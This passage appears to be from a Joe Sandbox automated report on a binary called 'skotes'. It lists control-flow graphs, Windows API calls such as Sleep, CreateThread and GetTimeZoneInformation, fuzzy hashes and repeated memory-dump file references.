                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                • String ID: H
                                                                                                                                                                • API String ID: 3443242726-2852464175
                                                                                                                                                                • Opcode ID: d6800c718975317522c5432d59a5017c52d889f9175ce43a498dc75254951f2a
                                                                                                                                                                • Instruction ID: 76429c7ddc5e87b7243de76603b700549196a5bb77836fc2c2ff9e6857f89633
                                                                                                                                                                • Opcode Fuzzy Hash: d6800c718975317522c5432d59a5017c52d889f9175ce43a498dc75254951f2a
                                                                                                                                                                • Instruction Fuzzy Hash: D3A1F132A041588FDF19EF6CC891BAE3BE1EB57324F14019DE812BF292DA759D12CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2418 bc26f2-bc271a call bc2133 call bc2191 2423 bc2720-bc272c call bc2139 2418->2423 2424 bc2842-bc289e call bb6c87 call bc62ee 2418->2424 2423->2424 2429 bc2732-bc273e call bc2165 2423->2429 2435 bc28a8-bc28ab 2424->2435 2436 bc28a0-bc28a6 2424->2436 2429->2424 2437 bc2744-bc2765 call bbadf5 GetTimeZoneInformation 2429->2437 2438 bc28ad-bc28bd call bbb04b 2435->2438 2439 bc28ee-bc2900 2435->2439 2436->2439 2445 bc276b-bc278c 2437->2445 2446 bc2820-bc2841 call bc212d call bc2121 call bc2127 2437->2446 2453 bc28bf 2438->2453 2454 bc28c7-bc28e0 call bc62ee 2438->2454 2443 bc2910 2439->2443 2444 bc2902-bc2905 2439->2444 2449 bc2915-bc292a call bbadf5 call b9cff1 2443->2449 2450 bc2910 call bc26f2 2443->2450 2444->2443 2448 bc2907-bc290e call bc2517 2444->2448 2451 bc278e-bc2793 2445->2451 2452 bc2796-bc279d 2445->2452 2448->2449 2450->2449 2451->2452 2458 bc27af-bc27b1 2452->2458 2459 bc279f-bc27a6 2452->2459 2460 bc28c0-bc28c5 call bbadf5 2453->2460 2474 bc28e5-bc28eb call bbadf5 2454->2474 2475 bc28e2-bc28e3 2454->2475 2467 bc27b3-bc27dc call bbef17 call bbe926 2458->2467 2459->2458 2465 bc27a8-bc27ad 2459->2465 2477 bc28ed 2460->2477 2465->2467 2485 bc27de-bc27e1 2467->2485 2486 bc27ea-bc27ec 2467->2486 2474->2477 2475->2460 2477->2439 2485->2486 2487 bc27e3-bc27e8 2485->2487 2488 bc27ee-bc280c call bbe926 2486->2488 2487->2488 2491 bc280e-bc2811 2488->2491 2492 bc281b-bc281e 2488->2492 2491->2492 2493 bc2813-bc2819 2491->2493 2492->2446 2493->2446
                                                                                                                                                                APIs
                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BD6758), ref: 00BC275C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                • API String ID: 565725191-239921721
                                                                                                                                                                • Opcode ID: a3d0da996c8f9a3ceaf568941e307952a0d42085f947101c4d051c56c57b2903
                                                                                                                                                                • Instruction ID: 104ffe30ad28a0432106d52b0b412f5222fd28666eb13bde13b2c6614a3cd91b
                                                                                                                                                                • Opcode Fuzzy Hash: a3d0da996c8f9a3ceaf568941e307952a0d42085f947101c4d051c56c57b2903
                                                                                                                                                                • Instruction Fuzzy Hash: 7051E571900255ABDB10EF69CCC1EAE77F8EF54360B1402EEE550A71A1EB709E458B60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2494 b87590-b875e1 Sleep 2495 b87661-b876d7 call b980c0 * 3 CreateThread Sleep 2494->2495 2496 b875e3-b875f7 call b9d111 2494->2496 2510 b876d9-b876e5 2495->2510 2511 b87705-b8771d 2495->2511 2496->2495 2501 b875f9-b8765e call b9d64e call b9d0c7 2496->2501 2501->2495 2514 b876fb-b87702 call b9d663 2510->2514 2515 b876e7-b876f5 2510->2515 2512 b8771f-b8772b 2511->2512 2513 b87747-b8775f 2511->2513 2517 b8773d-b87744 call b9d663 2512->2517 2518 b8772d-b8773b 2512->2518 2519 b87789-b8779a 2513->2519 2520 b87761-b8776d 2513->2520 2514->2511 2515->2514 2521 b8779b-b877a0 call bb6c6a 2515->2521 2517->2513 2518->2517 2518->2521 2525 b8777f-b87786 call b9d663 2520->2525 2526 b8776f-b8777d 2520->2526 2525->2519 2526->2521 2526->2525
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064,670DF653,?,00000000,00BC9138,000000FF), ref: 00B875CC
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00B87430,00BE8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00B876BE
                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B876C9
                                                                                                                                                                  • Part of subcall function 00B9D0C7: RtlWakeAllConditionVariable.NTDLL ref: 00B9D17B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 79123409-0
                                                                                                                                                                • Opcode ID: a0357cf88c6af057a4ff1e96642e2c8afd17152151adfcdba78d939042529dee
                                                                                                                                                                • Instruction ID: 4f84373e50d344a6b064cd68e95b4a49e653ca6c4dc2f6abf25c3333df4df6b5
                                                                                                                                                                • Opcode Fuzzy Hash: a0357cf88c6af057a4ff1e96642e2c8afd17152151adfcdba78d939042529dee
                                                                                                                                                                • Instruction Fuzzy Hash: 2D51C171240688AFEB14DF28DC85B9C3BE5EB45308F6046A9F8199B3E1CF79D880CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2531 bb6fb4-bb6fe9 GetFileType 2532 bb6fef-bb6ffa 2531->2532 2533 bb70a1-bb70a4 2531->2533 2534 bb701c-bb7038 call bb40f0 GetFileInformationByHandle 2532->2534 2535 bb6ffc-bb700d call bb732a 2532->2535 2536 bb70cd-bb70f5 2533->2536 2537 bb70a6-bb70a9 2533->2537 2547 bb70be-bb70cb call bb75c0 2534->2547 2552 bb703e-bb7080 call bb727c call bb7124 * 3 2534->2552 2549 bb70ba-bb70bc 2535->2549 2550 bb7013-bb701a 2535->2550 2538 bb7112-bb7114 2536->2538 2539 bb70f7-bb710a 2536->2539 2537->2536 2542 bb70ab-bb70ad 2537->2542 2544 bb7115-bb7123 call b9cff1 2538->2544 2539->2538 2555 bb710c-bb710f 2539->2555 2546 bb70af-bb70b4 call bb75f6 2542->2546 2542->2547 2546->2549 2547->2549 2549->2544 2550->2534 2567 bb7085-bb709d call bb7249 2552->2567 2555->2538 2567->2538 2570 bb709f 2567->2570 2570->2549
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BB6EE6), ref: 00BB6FD6
                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00BB7030
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00BB70C5
                                                                                                                                                                  • Part of subcall function 00BB732A: __dosmaperr.LIBCMT ref: 00BB735F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
